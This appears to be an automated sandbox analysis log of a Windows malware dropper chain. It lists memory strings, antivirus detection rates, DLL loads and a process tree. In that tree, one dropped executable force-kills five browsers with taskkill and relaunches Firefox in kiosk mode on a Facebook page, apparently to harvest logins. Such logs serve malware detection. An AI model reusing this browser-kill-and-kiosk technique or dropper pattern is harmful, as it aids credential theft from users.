Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2617164735.000000006C73F000.00000002.00000001.01000000.0000000E.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000003.1733012130.0000000005E47000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733332516.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2277724392.000000001D6E4000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2607664389.00000000057E4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2740168435.0000000005AAE000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2809108791.0000000005ACA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe	Virustotal: Detection: 42%
Source: file.exe	ReversingLabs: Detection: 31%

Source: 6IF65DE3AL7UEH5E4W09DIZ.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe "C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe"
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe "C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe "C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42e60347-4193-4a06-98d1-e931f84d08bb} 6604 "\\.\pipe\gecko-crash-server-pipe.6604" 1e752c6cf10 socket
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe "C:\Users\user\AppData\Local\Temp\1001608001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process created: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe "C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe "C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe "C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe "C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe "C:\Users\user\AppData\Local\Temp\1001608001\num.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Process created: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe "C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42e60347-4193-4a06-98d1-e931f84d08bb} 6604 "\\.\pipe\gecko-crash-server-pipe.6604" 1e752c6cf10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Section loaded: srvcli.dll	Jump to behavior
